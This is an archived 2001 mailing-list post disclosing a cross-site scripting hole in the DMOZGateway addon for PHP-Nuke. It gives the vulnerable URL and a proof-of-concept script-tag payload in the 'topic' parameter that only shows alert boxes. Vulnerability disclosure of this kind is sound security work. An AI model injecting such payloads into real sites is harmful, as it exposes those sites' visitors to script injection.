Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

CSS in DMOZGateway ( php-nuke )

From: frog frog <leseulfrog () hotmail com>
Date: 16 Dec 2001 10:48:25 -0000


New hole in an phpnuke addon. The concerned 
addon is DMOZGateway.
He allows to search on the web via the dmoz.org site.
The addon's url is th following one :

/modules.php?
op=modload&name=DMOZGateway&file=index

The cross site scripting hole is : 

/modules.php?
op=modload&name=DMOZGateway&file=index&topic
=<sc*ript>alert(document.domain)
</sc*ript><sc*ript>alert(/test/)</sc*ript>

(without the '*')

frog-m@n
Previous By Date Next
Previous By Thread Next

Current thread: